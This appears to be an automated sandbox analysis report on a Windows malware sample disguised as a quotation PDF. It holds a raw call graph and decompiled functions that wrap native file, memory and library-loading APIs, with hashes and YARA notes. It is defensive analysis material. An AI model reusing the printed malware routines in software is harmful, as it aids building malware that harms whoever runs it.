41bf98 18466->18467 18467->18385 18469 41af50 LdrLoadDll 18468->18469 18470 41a41c NtReadFile 18469->18470 18470->18386 18472 41bba4 18471->18472 18473 41bb8d 18471->18473 18472->18396 18473->18472 18474 41bf80 2 API calls 18473->18474 18475 41bbbb 18474->18475 18475->18396 18477 41af50 LdrLoadDll 18476->18477 18478 41a2ac 18477->18478 18478->18392 18480 41467d 18479->18480 18481 41af50 LdrLoadDll 18479->18481 18480->18405 18480->18406 18481->18480 18483 41af50 LdrLoadDll 18482->18483 18484 4146b9 18483->18484 18484->18411 18486 414825 18485->18486 18487 41af50 LdrLoadDll 18485->18487 18486->18439 18487->18486 18489 41bd5d 18488->18489 18612 41a530 18488->18612 18489->18319 18492 414071 18491->18492 18493 414079 18491->18493 18492->18322 18515 41434c 18493->18515 18615 41cf20 18493->18615 18495 4140cd 18496 41cf20 2 API calls 18495->18496 18500 4140d8 18496->18500 18497 414126 18499 41cf20 2 API calls 18497->18499 18501 41413a 18499->18501 18500->18497 18620 41cfc0 18500->18620 18502 41cf20 2 API calls 18501->18502 18504 4141ad 18502->18504 18503 41cf20 2 API calls 18505 4141f5 18503->18505 18504->18503 18626 41cf80 18505->18626 18508 41cf80 2 API calls 18509 41432e 18508->18509 18510 41cf80 2 API calls 18509->18510 18511 414338 18510->18511 18512 41cf80 2 API calls 18511->18512 18513 414342 18512->18513 18514 41cf80 2 API calls 18513->18514 18514->18515 18515->18322 18517 415391 18516->18517 18518 414a40 6 API calls 18517->18518 18520 4153a7 18518->18520 18519 4153fa 18519->18325 18520->18519 18521 4153e2 18520->18521 18522 4153f5 18520->18522 18523 41bdb0 2 API calls 18521->18523 18524 41bdb0 2 API calls 18522->18524 18525 4153e7 18523->18525 18524->18519 18525->18325 18527 41ad74 18526->18527 18528 41ac20 LdrLoadDll 18526->18528 18629 41ac20 18527->18629 18528->18527 18531 41ac20 LdrLoadDll 18532 41ad86 18531->18532 18533 41ac20 LdrLoadDll 18532->18533 18534 41ad8f 18533->18534 18535 41ac20 LdrLoadDll 18534->18535 18536 41ad98 18535->18536 18537 41ac20 LdrLoadDll 18536->18537 18538 41ada0 18537->18538 18539 41ac20 LdrLoadDll 18538->18539 18540 41adad 18539->18540 18541 41ac20 LdrLoadDll 18540->18541 18542 41adb6 18541->18542 18543 41ac20 LdrLoadDll 18542->18543 18544 41adbf 18543->18544 18545 41ac20 LdrLoadDll 18544->18545 18546 41adc8 18545->18546 18547 41ac20 LdrLoadDll 18546->18547 18548 41add1 18547->18548 18549 41ac20 LdrLoadDll 18548->18549 18550 41adda 18549->18550 18551 41ac20 LdrLoadDll 18550->18551 18552 41ade6 18551->18552 18553 41ac20 LdrLoadDll 18552->18553 18554 41adef 18553->18554 18555 41ac20 LdrLoadDll 18554->18555 18556 41adf8 18555->18556 18557 41ac20 LdrLoadDll 18556->18557 18558 41ae01 18557->18558 18559 41ac20 LdrLoadDll 18558->18559 18560 41ae0a 18559->18560 18561 41ac20 LdrLoadDll 18560->18561 18562 41ae13 18561->18562 18563 41ac20 LdrLoadDll 18562->18563 18564 41ae1f 18563->18564 18565 41ac20 LdrLoadDll 18564->18565 18566 41ae28 18565->18566 18567 41ac20 LdrLoadDll 18566->18567 18568 41ae31 18567->18568 18569 41ac20 LdrLoadDll 18568->18569 18570 41ae3a 18569->18570 18571 41ac20 LdrLoadDll 18570->18571 18572 41ae43 18571->18572 18573 41ac20 LdrLoadDll 18572->18573 18574 41ae4c 18573->18574 18575 41ac20 LdrLoadDll 18574->18575 18576 41ae58 18575->18576 18577 41ac20 LdrLoadDll 18576->18577 18578 41ae61 18577->18578 18579 41ac20 LdrLoadDll 18578->18579 18580 41ae6a 18579->18580 18581 41ac20 LdrLoadDll 18580->18581 18582 41ae73 18581->18582 18583 41ac20 LdrLoadDll 18582->18583 18584 41ae7c 18583->18584 18585 41ac20 LdrLoadDll 18584->18585 18586 41ae85 18585->18586 18587 41ac20 LdrLoadDll 18586->18587 18588 41ae91 18587->18588 18589 41ac20 LdrLoadDll 18588->18589 18590 41ae9a 18589->18590 18591 41ac20 LdrLoadDll 18590->18591 18592 41aea3 18591->18592 18593 41ac20 LdrLoadDll 18592->18593 18594 41aeac 18593->18594 18595 41ac20 LdrLoadDll 18594->18595 18596 41aeb5 18595->18596 18597 41ac20 LdrLoadDll 18596->18597 18598 41aebe 18597->18598 18599 41ac20 LdrLoadDll 18598->18599 18600 41aeca 18599->18600 18601 41ac20 LdrLoadDll 18600->18601 18602 41aed3 18601->18602 18603 41ac20 LdrLoadDll 18602->18603 18604 41aedc 18603->18604 18604->18330 18606 41af50 LdrLoadDll 18605->18606 18607 419ecc 18606->18607 18607->18211 18609 41af03 18608->18609 18635 41a4b0 18609->18635 18613 41a54c NtAllocateVirtualMemory 18612->18613 18614 41af50 LdrLoadDll 18612->18614 18613->18489 18614->18613 18616 41cf30 18615->18616 18617 41cf36 18615->18617 18616->18495 18618 41cf5c 18617->18618 18619 41bf80 2 API calls 18617->18619 18618->18495 18619->18618 18621 41cfe5 18620->18621 18623 41d01d 18620->18623 18622 41bf80 2 API calls 18621->18622 18624 41cffa 18622->18624 18623->18500 18625 41bdb0 2 API calls 18624->18625 18625->18623 18627 41bdb0 2 API calls 18626->18627 18628 414324 18627->18628 18628->18508 18630 41ac3b 18629->18630 18631 414e40 LdrLoadDll 18630->18631 18632 41ac5b 18631->18632 18633 414e40 LdrLoadDll 18632->18633 18634 41ad07 18632->18634 18633->18634 18634->18531 18636 41af50 LdrLoadDll 18635->18636 18637 41a4cc 18636->18637 18637->18327 18639 41af50 LdrLoadDll 18638->18639 18640 41a67c RtlFreeHeap 18639->18640 18640->18337 18642 407eb0 18641->18642 18643 407eab 18641->18643 18644 41bd30 2 API calls 18642->18644 18643->18219 18650 407ed5 18644->18650 18645 407f38 18645->18219 18646 419eb0 LdrLoadDll 18646->18650 18647 407f3e 18648 407f64 18647->18648 18651 41a5b0 LdrLoadDll 18647->18651 18648->18219 18650->18645 18650->18646 18650->18647 18652 41bd30 2 API calls 18650->18652 18657 41a5b0 18650->18657 18653 407f55 18651->18653 18652->18650 18653->18219 18655 41a5b0 LdrLoadDll 18654->18655 18656 40817e 18655->18656 18656->18178 18658 41af50 LdrLoadDll 18657->18658 18659 41a5cc 18658->18659 18659->18650 18661 40af24 18660->18661 18664 419c80 18661->18664 18663 40af5e 18663->18229 18665 419c9c 18664->18665 18666 41af50 LdrLoadDll 18664->18666 18665->18663 18666->18665 18670 41bec8 18667->18670 18672 41a570 18667->18672 18669 41bedc 18669->18236 18670->18669 18671 41a570 LdrLoadDll 18670->18671 18671->18670 18673 41af50 LdrLoadDll 18672->18673 18674 41a58c 18673->18674 18674->18670 18676 41b5b3 18675->18676 18677 40ace0 LdrLoadDll 18676->18677 18678 409c61 18677->18678 18678->18190 18680 40b053 18679->18680 18681 419c80 LdrLoadDll 18680->18681 18682 40b0d0 18680->18682 18681->18682 18682->18193 18684 41af50 LdrLoadDll 18683->18684 18685 40f1ab 18684->18685 18685->18201 18686 41a7c0 18685->18686 18687 41af50 LdrLoadDll 18686->18687 18688 41a7df LookupPrivilegeValueW 18687->18688 18688->18197 18690 41af50 LdrLoadDll 18689->18690 18691 41a26c 18690->18691 18691->18200 18693 40b1b9 18692->18693 18694 40b030 LdrLoadDll 18693->18694 18695 40b1f4 18694->18695 18695->18133 18697 40ae41 18696->18697 18698 40ae3d 18696->18698 18699 40ae8c 18697->18699 18702 40ae5a 18697->18702 18698->18136 18700 419cc0 LdrLoadDll 18699->18700 18701 40ae9d 18700->18701 18701->18136 18731 419cc0 18702->18731 18706 40f490 LdrLoadDll 18705->18706 18707 4143b6 18706->18707 18707->18138 18709 408a79 18708->18709 18734 4087a0 18708->18734 18711 408a9d 18709->18711 18712 4087a0 8 API calls 18709->18712 18711->18140 18713 408a8a 18712->18713 18713->18711 18752 40f700 18713->18752 18716 41af50 LdrLoadDll 18715->18716 18717 40c312 18716->18717 18718 40f490 18717->18718 18719 40f4ad 18718->18719 18720 419fb0 LdrLoadDll 18719->18720 18721 40f4ee 18720->18721 18722 40f4f5 18721->18722 18723 41a000 LdrLoadDll 18721->18723 18722->18144 18724 40f51e 18723->18724 18724->18144 18726 41af50 LdrLoadDll 18725->18726 18727 40c449 18726->18727 18727->18161 18729 41af50 LdrLoadDll 18728->18729 18730 40c49c 18729->18730 18730->18165 18732 41af50 LdrLoadDll 18731->18732 18733 40ae7c 18732->18733 18733->18136 18735 407ea0 2 API calls 18734->18735 18750 4087ba 18735->18750 18736 408a49 18736->18709 18737 408a3f 18737->18736 18738 408160 LdrLoadDll 18737->18738 18738->18736 18741 419ef0 LdrLoadDll 18741->18750 18743 40c4b0 LdrLoadDll NtClose 18743->18750 18744 41a480 LdrLoadDll NtClose 18744->18750 18749 419e10 LdrLoadDll 18749->18750 18750->18736 18750->18737 18750->18741 18750->18743 18750->18744 18750->18749 18760 419d00 18750->18760 18763 4085d0 18750->18763 18775 40f5e0 18750->18775 18783 419d80 18750->18783 18786 419db0 18750->18786 18789 419e40 18750->18789 18792 4083a0 18750->18792 18808 405f60 18750->18808 18753 40f725 18752->18753 18754 4081a0 6 API calls 18753->18754 18758 40f749 18754->18758 18755 40f756 18755->18711 18756 414a40 6 API calls 18756->18758 18758->18755 18758->18756 18759 41bdb0 2 API calls 18758->18759 18893 40f540 18758->18893 18759->18758 18761 419d1c 18760->18761 18762 41af50 LdrLoadDll 18760->18762 18761->18750 18762->18761 18764 4085e6 18763->18764 18818 419870 18764->18818 18766 408771 18766->18750 18767 4085ff 18767->18766 18839 4081a0 18767->18839 18769 4086e5 18769->18766 18770 4083a0 7 API calls 18769->18770 18771 408713 18770->18771 18771->18766 18772 419ef0 LdrLoadDll 18771->18772 18773 408748 18772->18773 18773->18766 18774 41a4f0 LdrLoadDll 18773->18774 18774->18766 18872 419d40 18775->18872 18778 40f645 18778->18750 18781 40f651 18781->18750 18782 41a480 2 API calls 18782->18778 18784 419d9c 18783->18784 18785 41af50 LdrLoadDll 18783->18785 18784->18750 18785->18784 18787 41af50 LdrLoadDll 18786->18787 18788 419dcc 18787->18788 18788->18750 18790 41af50 LdrLoadDll 18789->18790 18791 419e5c 18790->18791 18791->18750 18793 4083c9 18792->18793 18878 408310 18793->18878 18796 41a4f0 LdrLoadDll 18797 4083dc 18796->18797 18797->18796 18798 408467 18797->18798 18800 408462 18797->18800 18886 40f660 18797->18886 18798->18750 18799 41a480 2 API calls 18801 40849a 18799->18801 18800->18799 18801->18798 18802 419d00 LdrLoadDll 18801->18802 18803 4084ff 18802->18803 18803->18798 18804 419d40 LdrLoadDll 18803->18804 18805 408563 18804->18805 18805->18798 18806 414a40 6 API calls 18805->18806 18807 4085b8 18806->18807 18807->18750 18809 405faa 18808->18809 18810 419d00 LdrLoadDll 18809->18810 18811 405fc4 18810->18811 18812 414e40 LdrLoadDll 18811->18812 18817 40609c 18811->18817 18813 406018 18812->18813 18814 40af00 LdrLoadDll 18813->18814 18815 406077 18814->18815 18816 414e40 LdrLoadDll 18815->18816 18816->18817 18817->18750 18819 41bf80 2 API calls 18818->18819 18820 419887 18819->18820 18846 409310 18820->18846 18822 4198a2 18823 4198e0 18822->18823 18824 4198c9 18822->18824 18827 41bd30 2 API calls 18823->18827 18825 41bdb0 2 API calls 18824->18825 18826 4198d6 18825->18826 18826->18767 18828 41991a 18827->18828 18829 41bd30 2 API calls 18828->18829 18830 419933 18829->18830 18836 419bd4 18830->18836 18852 41bd70 18830->18852 18833 419bc0 18834 41bdb0 2 API calls 18833->18834 18835 419bca 18834->18835 18835->18767 18837 41bdb0 2 API calls 18836->18837 18838 419c29 18837->18838 18838->18767 18840 40829f 18839->18840 18841 4081b5 18839->18841 18840->18769 18841->18840 18842 414a40 6 API calls 18841->18842 18843 408222 18842->18843 18844 41bdb0 2 API calls 18843->18844 18845 408249 18843->18845 18844->18845 18845->18769 18847 409335 18846->18847 18848 40ace0 LdrLoadDll 18847->18848 18849 409368 18848->18849 18851 40938d 18849->18851 18855 40cf10 18849->18855 18851->18822 18853 41a570 LdrLoadDll 18852->18853 18854 419bb9 18853->18854 18854->18833 18854->18836 18856 40cf3c 18855->18856 18857 41a1d0 LdrLoadDll 18856->18857 18858 40cf55 18857->18858 18859 40cf5c 18858->18859 18866 41a210 18858->18866 18859->18851 18863 40cf97 18864 41a480 2 API calls 18863->18864 18865 40cfba 18864->18865 18865->18851 18867 41af50 LdrLoadDll 18866->18867 18868 40cf7f 18867->18868 18868->18859 18869 41a800 18868->18869 18870 41a81f 18869->18870 18871 41af50 LdrLoadDll 18869->18871 18870->18863 18871->18870 18873 41af50 LdrLoadDll 18872->18873 18874 40f624 18873->18874 18874->18778 18875 419de0 18874->18875 18876 41af50 LdrLoadDll 18875->18876 18877 40f635 18876->18877 18877->18781 18877->18782 18879 408328 18878->18879 18880 40ace0 LdrLoadDll 18879->18880 18881 408343 18880->18881 18882 414e40 LdrLoadDll 18881->18882 18883 408353 18882->18883 18884 40835c PostThreadMessageW 18883->18884 18885 408370 18883->18885 18884->18885 18885->18797 18887 40f673 18886->18887 18890 419e80 18887->18890 18891 41af50 LdrLoadDll 18890->18891 18892 40f69e 18891->18892 18892->18797 18894 40f551 18893->18894 18902 41a6d0 18894->18902 18897 40f598 18897->18758 18898 419ef0 LdrLoadDll 18899 40f5af 18898->18899 18899->18897 18900 41a4f0 LdrLoadDll 18899->18900 18901 40f5ce 18900->18901 18901->18758 18903 41af50 LdrLoadDll 18902->18903 18904 40f591 18903->18904 18904->18897 18904->18898

                                  Executed Functions

                                  Function 0041A400 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 41a400-41a449 call 41af50 NtReadFile
                                  C-Code - Quality: 37%
                                  			E0041A400(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041AF50(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x414a21
				_t6 =  &_a32; // 0x414d62
				_t12 =  &_a8; // 0x414d62
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}






                                  0x0041a403
                                  0x0041a40f
                                  0x0041a417
                                  0x0041a41c
                                  0x0041a422
                                  0x0041a43d
                                  0x0041a445
                                  0x0041a449

                                  APIs
                                  • NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A445
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.834375246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_400000_QUOTATION PDF_SCAN_COPY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileRead
                                  • String ID: !JA$bMA$bMA
                                  • API String ID: 2738559852-4222312340
                                  • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                  • Instruction ID: 27817754ac388b25b847a3362b671b2e44b934df7eae6808a762aa4d31f9cf83
                                  • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                  • Instruction Fuzzy Hash: 93F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040ACE0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 231 40ace0-40ad09 call 41cc40 234 40ad0b-40ad0e 231->234 235 40ad0f-40ad1d call 41d060 231->235 238 40ad2d-40ad3e call 41b490 235->238 239 40ad1f-40ad2a call 41d2e0 235->239 244 40ad40-40ad54 LdrLoadDll 238->244 245 40ad57-40ad5a 238->245 239->238 244->245
                                  C-Code - Quality: 100%
                                  			E0040ACE0(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041CC40( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041D060(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041D2E0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041B490(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                  0x0040acfc
                                  0x0040acff
                                  0x0040ad04
                                  0x0040ad09
                                  0x0040ad13
                                  0x0040ad18
                                  0x0040ad1b
                                  0x0040ad1d
                                  0x0040ad25
                                  0x0040ad2a
                                  0x0040ad2a
                                  0x0040ad31
                                  0x0040ad39
                                  0x0040ad3c
                                  0x0040ad3e
                                  0x0040ad52
                                  0x00000000
                                  0x0040ad54
                                  0x0040ad5a
                                  0x0040ad0e
                                  0x0040ad0e
                                  0x0040ad0e

                                  APIs
                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.834375246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_400000_QUOTATION PDF_SCAN_COPY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Load
                                  • String ID:
                                  • API String ID: 2234796835-0
                                  • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                  • Instruction ID: d499f532a4605d4acc668fd39ab8700ce4e6b27de0f8ef54b1fb0fb48fae0bb4
                                  • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                  • Instruction Fuzzy Hash: EF0152B5D4020DA7DB10EBA5DC42FDEB3789F14308F0041A5E908A7281F634EB54CB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041A34A Relevance: 1.5, APIs: 1, Instructions: 41filenativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 246 41a34a-41a3a1 call 41af50 NtCreateFile
                                  C-Code - Quality: 82%
                                  			E0041A34A(void* __edx) {
				long _t23;
				void* _t34;
				void* _t38;

				 *((intOrPtr*)(_t38 - 0x75)) =  *((intOrPtr*)(_t38 - 0x75)) + __edx;
				_push(_t38);
				_t17 =  *0x0B724B6A;
				_t5 = _t17 + 0xc40; // 0xc40
				E0041AF50(_t34,  *0x0B724B6A, _t5,  *((intOrPtr*)( *0x0B724B6A + 0x10)), 0, 0x28);
				_t23 = NtCreateFile( *0x0B724B6E,  *0x0B724B72,  *0x0B724B76,  *0x0B724B7A,  *0x0B724B7E,  *0x0B724B82,  *0x0B724B86,  *0x0B724B8A,  *0x0B724B8E,  *0x0B724B92,  *0x0B724B96); // executed
				return _t23;
			}






                                  0x0041a34f
                                  0x0041a350
                                  0x0041a353
                                  0x0041a35f
                                  0x0041a367
                                  0x0041a39d
                                  0x0041a3a1

                                  APIs
                                  • NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A39D
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.834375246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_400000_QUOTATION PDF_SCAN_COPY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID:
                                  • API String ID: 823142352-0
                                  • Opcode ID: 45b73c4b6895c70ba59c4178488d87c890bd37f76c5a0b72dfe575257da8a24b
                                  • Instruction ID: 5c3a731bd8c5ac799073499202a5f70b05661501e7ffc5281ceb94e804ad1467
                                  • Opcode Fuzzy Hash: 45b73c4b6895c70ba59c4178488d87c890bd37f76c5a0b72dfe575257da8a24b
                                  • Instruction Fuzzy Hash: 6101AFB2601208AFCB48CF98DC85EEB77A9AF8C354F158259BA1D97241D630E8518BA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041A350 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 249 41a350-41a366 250 41a36c-41a3a1 NtCreateFile 249->250 251 41a367 call 41af50 249->251 251->250
                                  C-Code - Quality: 100%
                                  			E0041A350(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E0041AF50(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                  0x0041a35f
                                  0x0041a367
                                  0x0041a39d
                                  0x0041a3a1

                                  APIs
                                  • NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A39D
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.834375246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_400000_QUOTATION PDF_SCAN_COPY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID:
                                  • API String ID: 823142352-0
                                  • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                  • Instruction ID: 880687b14e2bfdcefdfb108c829fe1d34a34742feba638e3287dae326a4d6923
                                  • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                  • Instruction Fuzzy Hash: AAF0BDB2201208AFCB08CF89DC85EEB77ADAF8C754F158248BA1D97241C630E8518BA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041A52D Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 252 41a52d-41a56d call 41af50 NtAllocateVirtualMemory
                                  C-Code - Quality: 79%
                                  			E0041A52D(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t22;

				asm("in al, dx");
				_t10 = _a4;
				_t3 = _t10 + 0xc60; // 0xca0
				E0041AF50(_t22, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                  0x0041a52d
                                  0x0041a533
                                  0x0041a53f
                                  0x0041a547
                                  0x0041a569
                                  0x0041a56d

                                  APIs
                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B124,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A569
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.834375246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_400000_QUOTATION PDF_SCAN_COPY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateMemoryVirtual
                                  • String ID:
                                  • API String ID: 2167126740-0
                                  • Opcode ID: 3b8d222a341c785ffa3cf4549ca1d2e65702f2891609bf00208dfa36f1ec44b6
                                  • Instruction ID: a026edfd27163e0ec87989f8402fc382ff3e4b3aa5753642b80e820a213edbe6
                                  • Opcode Fuzzy Hash: 3b8d222a341c785ffa3cf4549ca1d2e65702f2891609bf00208dfa36f1ec44b6
                                  • Instruction Fuzzy Hash: D5F01CB5200108AFCB14DF89DC80EE777A9AF8C354F118149BA1C97241C630E811CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041A530 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 255 41a530-41a546 256 41a54c-41a56d NtAllocateVirtualMemory 255->256 257 41a547 call 41af50 255->257 257->256
                                  C-Code - Quality: 100%
                                  			E0041A530(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041AF50(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                  0x0041a53f
                                  0x0041a547
                                  0x0041a569
                                  0x0041a56d

                                  APIs
                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B124,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A569
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.834375246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_400000_QUOTATION PDF_SCAN_COPY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateMemoryVirtual
                                  • String ID:
                                  • API String ID: 2167126740-0
                                  • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                  • Instruction ID: 4e0f78fd3c2c10b6dba7ecb12144fed22081eaa1fb7babd41561f41a61d0d9a2
                                  • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                  • Instruction Fuzzy Hash: A3F015B2200208AFCB14DF89CC81EEB77ADAF88754F118149BE1C97241C630F811CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041A480 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 267 41a480-41a4a9 call 41af50 NtClose
                                  APIs
                                  • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A4A5
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.834375246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_400000_QUOTATION PDF_SCAN_COPY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close
                                  • String ID:
                                  • API String ID: 3535843008-0
                                  • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                  • Instruction ID: 58703de6d0d09b45194c1a78dafb6a6614d70e6a8447524affba2eb7b0ba4c9c
                                  • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                  • Instruction Fuzzy Hash: E9D01776200214ABD710EB99CC85EE77BACEF48764F154499BA1C9B242C530FA1086E4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041A484 Relevance: 1.5, APIs: 1, Instructions: 16nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A4A5
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.834375246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_400000_QUOTATION PDF_SCAN_COPY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close
                                  • String ID:
                                  • API String ID: 3535843008-0
                                  • Opcode ID: ae9cf654291369d396892bc59618d1ad2f9413c78f5c7aed08672f6eae5876ad
                                  • Instruction ID: ba48b8a80e488091c18a7d95187c4c5c332fda959c7d58b24858914be2f996ec
                                  • Opcode Fuzzy Hash: ae9cf654291369d396892bc59618d1ad2f9413c78f5c7aed08672f6eae5876ad
                                  • Instruction Fuzzy Hash: 2ED0A7B940E2C04FCB11EBB464C10C67F40DE5112C7144ACEE4AC07607D164D2199391
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00409AA0 Relevance: .1, Instructions: 92COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 93%
